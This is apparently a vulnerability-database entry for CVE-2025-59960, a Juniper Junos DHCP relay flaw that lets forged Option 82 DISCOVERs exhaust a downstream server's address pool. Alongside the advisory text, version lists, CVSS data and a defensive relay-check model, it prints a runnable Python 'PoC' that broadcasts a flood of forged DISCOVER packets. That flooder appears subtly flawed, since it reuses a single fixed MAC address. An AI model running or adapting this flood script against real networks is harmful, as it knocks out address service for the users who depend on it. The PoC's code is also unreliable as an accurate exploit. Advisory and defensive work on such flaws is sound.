Security Vulnerability Report
CVE-2025-59960 CVSS 7.4 HIGH

CVE-2025-59960

Published: 2026-01-15 21:16:03
Last Modified: 2026-01-23 19:39:11

Description

An Improper Check for Unusual or Exceptional Conditions vulnerability in the Juniper DHCP service (jdhcpd) of Juniper Networks Junos OS and Junos OS Evolved allows a DHCP client in one subnet to exhaust the address pools of other subnets, leading to a Denial of Service (DoS) on the downstream DHCP server.

By default, the DHCP relay agent inserts its own Option 82 information when forwarding client requests, optionally replacing any Option 82 information provided by the client. When a specific DHCP DISCOVER is received in 'forward-only' mode with Option 82, the device should drop the message unless 'trust-option82' is configured. Instead, the DHCP relay forwards these packets to the DHCP server unmodified, which uses up addresses in the DHCP server's address pool, ultimately leading to address pool exhaustion.

This issue affects Junos OS:

 * all versions before 21.2R3-S10,
 * from 21.4 before 21.4R3-S12,
 * all versions of 22.2,
 * from 22.4 before 22.4R3-S8,
 * from 23.2 before 23.2R2-S5,
 * from 23.4 before 23.4R2-S6,
 * from 24.2 before 24.2R2-S2,
 * from 24.4 before 24.4R2,
 * from 25.2 before 25.2R1-S1, 25.2R2.

Junos OS Evolved:

 * all versions before 21.4R3-S12-EVO,
 * all versions of 22.2-EVO,
 * from 22.4 before 22.4R3-S8-EVO,
 * from 23.2 before 23.2R2-S5-EVO,
 * from 23.4 before 23.4R2-S6-EVO,
 * from 24.2 before 24.2R2-S2-EVO,
 * from 24.4 before 24.4R2-EVO,
 * from 25.2 before 25.2R1-S1-EVO, 25.2R2-EVO.
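The check the description says a relay should apply can be modelled in a few lines; this is an added illustration for defenders, not Juniper's code and not part of the original record. The function names are hypothetical, treating a zero giaddr as the marker of a packet that arrived directly from a client (the RFC 3046 convention) is an assumption, and the rule is applied to any client message rather than only DISCOVER.

```python
MAGIC_COOKIE = b"\x63\x82\x53\x63"
OPT_PAD, OPT_MSG_TYPE, OPT_RELAY_INFO, OPT_END = 0, 53, 82, 255
DHCPDISCOVER = 1

def parse_options(msg: bytes) -> dict:
    """Return {option_code: value} for a BOOTP/DHCP message (first occurrence wins)."""
    if len(msg) < 240 or msg[236:240] != MAGIC_COOKIE:
        raise ValueError("not a DHCP message")
    opts, i = {}, 240
    while i < len(msg):
        code = msg[i]
        if code == OPT_END:
            break
        if code == OPT_PAD:  # single-byte padding option, no length field
            i += 1
            continue
        if i + 2 > len(msg) or i + 2 + msg[i + 1] > len(msg):
            raise ValueError("truncated option")
        length = msg[i + 1]
        opts.setdefault(code, msg[i + 2 : i + 2 + length])
        i += 2 + length
    return opts

def relay_decision(msg: bytes, trust_option82: bool = False) -> str:
    """Model of the expected check: drop client packets that already carry Option 82."""
    try:
        opts = parse_options(msg)
    except ValueError:
        return "drop"  # unparseable input is never relayed
    from_client = msg[24:28] == b"\x00" * 4  # assumption: zero giaddr = no upstream relay
    if OPT_RELAY_INFO in opts and from_client and not trust_option82:
        return "drop"
    return "forward"

def sample_discover(option82: bytes = b"", giaddr: bytes = b"\x00" * 4) -> bytes:
    """Constructed sample message (zeroed BOOTP header plus options), not captured traffic."""
    hdr = bytearray(236)
    hdr[0:3] = bytes([1, 1, 6])  # op=BOOTREQUEST, htype=Ethernet, hlen=6
    hdr[24:28] = giaddr
    opts = bytes([OPT_MSG_TYPE, 1, DHCPDISCOVER])
    if option82:
        opts += bytes([OPT_RELAY_INFO, len(option82)]) + option82
    return bytes(hdr) + MAGIC_COOKIE + opts + bytes([OPT_END])
```

The same predicate works as a detection rule on a capture taken at the relay's client-facing interface: any message for which `relay_decision` returns "drop" should never appear on the server-facing side of a relay that does not have 'trust-option82' configured.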

CVSS Details

CVSS Score: 7.4
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:juniper:junos:21.2:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:juniper:junos:21.2:r1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:juniper:junos:21.2:r1-s1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:juniper:junos:21.2:r1-s2:*:*:*:*:*:* - VULNERABLE
Junos OS: < 21.2R3-S10
Junos OS: 21.4 - 21.4R3-S11
Junos OS: 22.2 (all versions)
Junos OS: 22.4 - 22.4R3-S7
Junos OS: 23.2 - 23.2R2-S4
Junos OS: 23.4 - 23.4R2-S5
Junos OS: 24.2 - 24.2R2-S1
Junos OS: 24.4 - 24.4R1
Junos OS: 25.2 - 25.2R1
Junos OS Evolved: < 21.4R3-S12-EVO
Junos OS Evolved: 22.2-EVO (all versions)
Junos OS Evolved: 22.4 - 22.4R3-S7-EVO
Junos OS Evolved: 23.2 - 23.2R2-S4-EVO
Junos OS Evolved: 23.4 - 23.4R2-S5-EVO
Junos OS Evolved: 24.2 - 24.2R2-S1-EVO
Junos OS Evolved: 24.4 - 24.4R1-EVO
Junos OS Evolved: 25.2 - 25.2R1-EVO

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
# CVE-2025-59960 PoC - DHCP Address Pool Exhaustion
# This PoC demonstrates sending malformed DHCP DISCOVER with Option 82
# to trigger address pool exhaustion on downstream DHCP server

import socket
import struct
import random


def create_dhcp_discover_with_option82():
    """Create a DHCP DISCOVER packet with malicious Option 82"""
    # DHCP Message Type: Discover (1)
    # Hardware Type: Ethernet (1)
    # Hardware Address Length: 6
    # Hops: 0
    # Transaction ID: random 4 bytes
    xid = random.randint(0, 0xFFFFFFFF)

    # Create DHCP header
    packet = struct.pack('!4B',
        1,  # op: BOOTREQUEST
        1,  # htype: ETHERNET
        6,  # hlen: MAC address length
        0   # hops
    )
    packet += struct.pack('!I', xid)    # Transaction ID
    packet += struct.pack('!HH', 0, 0)  # Seconds elapsed, Flags
    packet += b'\x00' * 4  # Ciaddr (client IP)
    packet += b'\x00' * 4  # Yiaddr (your IP)
    packet += b'\x00' * 4  # Siaddr (server IP)
    packet += b'\x00' * 4  # Giaddr (relay IP)

    # MAC address (attacker)
    packet += b'\x00\x11\x22\x33\x44\x55'
    packet += b'\x00' * 202  # Padding for hardware address

    # Magic cookie
    packet += b'\x63\x82\x53\x63'

    # DHCP Options
    # Option 53: DHCP Message Type
    packet += struct.pack('!BB', 53, 1)  # DHCP DISCOVER
    packet += struct.pack('!B', 1)

    # Option 82: Relay Agent Information (malicious)
    # Circuit ID and Remote ID can be manipulated
    packet += struct.pack('!BB', 82, 6)
    packet += struct.pack('!BB', 1, 4)  # Circuit ID sub-option
    packet += b'\x00\x01\x02\x03'       # Fake circuit ID
    packet += struct.pack('!BB', 2, 2)  # Remote ID sub-option
    packet += b'\xAA\xBB'               # Fake remote ID

    # Option 55: Parameter Request List
    packet += struct.pack('!BB', 55, 3)
    packet += struct.pack('!BBB', 1, 3, 6)

    # Option 255: End
    packet += struct.pack('!B', 255)

    return packet


def send_dhcp_flood(target_broadcast='255.255.255.255', count=1000):
    """Send multiple DHCP DISCOVER packets to exhaust address pool"""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)

    print(f"[*] Sending {count} malformed DHCP DISCOVER packets...")

    for i in range(count):
        packet = create_dhcp_discover_with_option82()
        try:
            sock.sendto(packet, (target_broadcast, 67))
            if i % 100 == 0:
                print(f"[+] Sent {i} packets...")
        except Exception as e:
            print(f"[-] Error sending packet: {e}")

    sock.close()
    print("[*] Flooding complete")


if __name__ == '__main__':
    import sys
    count = int(sys.argv[1]) if len(sys.argv) > 1 else 1000
    send_dhcp_flood(count=count)
```

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59960", "sourceIdentifier": "[email protected]", "published": "2026-01-15T21:16:03.213", "lastModified": "2026-01-23T19:39:11.287", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Improper Check for Unusual or Exceptional Conditions vulnerability in the Juniper DHCP service (jdhcpd) of Juniper Networks Junos OS and Junos OS Evolved allows a DHCP client in one subnet to exhaust the address pools of other subnets, leading to a Denial of Service (DoS) on the downstream DHCP server.\n\n\n\nBy default, the DHCP relay agent inserts its own Option 82 information when forwarding client requests, optionally replacing any Option 82 information provided by the client. When a specific DHCP DISCOVER is received in 'forward-only' mode with Option 82, the device should drop the message unless 'trust-option82' is configured. Instead, the DHCP relay forwards these packets to the DHCP server unmodified, which uses up addresses in the DHCP server's address pool, ultimately leading to address pool exhaustion.\n\nThis issue affects Junos OS: \n\n\n\n * all versions before 21.2R3-S10,\n * from 21.4 before 21.4R3-S12,\n * all versions of 22.2,\n * from 22.4 before 22.4R3-S8, \n * from 23.2 before 23.2R2-S5, \n * from 23.4 before 23.4R2-S6, \n * from 24.2 before 24.2R2-S2, \n * from 24.4 before 24.4R2, \n * from 25.2 before 25.2R1-S1, 25.2R2.\n\n\n\n\nJunos OS Evolved:\n\n\n\n * all versions before 21.4R3-S12-EVO, \n * all versions of 22.2-EVO,\n * from 22.4 before 22.4R3-S8-EVO, \n * from 23.2 before 23.2R2-S5-EVO, \n * from 23.4 before 23.4R2-S6-EVO, \n * from 24.2 before 24.2R2-S2-EVO, \n * from 24.4 before 24.4R2-EVO, \n * from 25.2 before 25.2R1-S1-EVO, 25.2R2-EVO."}, {"lang": "es", "value": "Una vulnerabilidad de Comprobación Incorrecta de Condiciones Inusuales o Excepcionales en el servicio DHCP de Juniper (jdhcpd) de Juniper Networks Junos OS y Junos OS Evolved permite a un cliente DHCP en una subred agotar los grupos 
de direcciones de otras subredes, lo que lleva a una Denegación de Servicio (DoS) en el servidor DHCP descendente.\n\nPor defecto, el agente de retransmisión DHCP inserta su propia información de Opción 82 al reenviar solicitudes de cliente, reemplazando opcionalmente cualquier información de Opción 82 proporcionada por el cliente. Cuando se recibe un DHCP DISCOVER específico en modo 'solo reenvío' con Opción 82, el dispositivo debería descartar el mensaje a menos que 'trust-option82' esté configurado. En su lugar, el retransmisor DHCP reenvía estos paquetes al servidor DHCP sin modificar, lo que consume direcciones en el grupo de direcciones del servidor DHCP, lo que finalmente lleva al agotamiento del grupo de direcciones.\n\nEste problema afecta a Junos OS:\n\n * todas las versiones anteriores a 21.2R3-S10,\n * desde 21.4 anteriores a 21.4R3-S12,\n * todas las versiones de 22.2,\n * desde 22.4 anteriores a 22.4R3-S8,\n * desde 23.2 anteriores a 23.2R2-S5,\n * desde 23.4 anteriores a 23.4R2-S6,\n * desde 24.2 anteriores a 24.2R2-S2,\n * desde 24.4 anteriores a 24.4R2,\n * desde 25.2 anteriores a 25.2R1-S1, 25.2R2.\n\nJunos OS Evolved:\n\n * todas las versiones anteriores a 21.4R3-S12-EVO,\n * todas las versiones de 22.2-EVO,\n * desde 22.4 anteriores a 22.4R3-S8-EVO,\n * desde 23.2 anteriores a 23.2R2-S5-EVO,\n * desde 23.4 anteriores a 23.4R2-S6-EVO,\n * desde 24.2 anteriores a 24.2R2-S2-EVO,\n * desde 24.4 anteriores a 24.4R2-EVO,\n * desde 25.2 anteriores a 25.2R1-S1-EVO, 25.2R2-EVO."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:N/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:U/V:C/RE:M/U:Amber", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", 
"userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "YES", "Recover ... (truncated)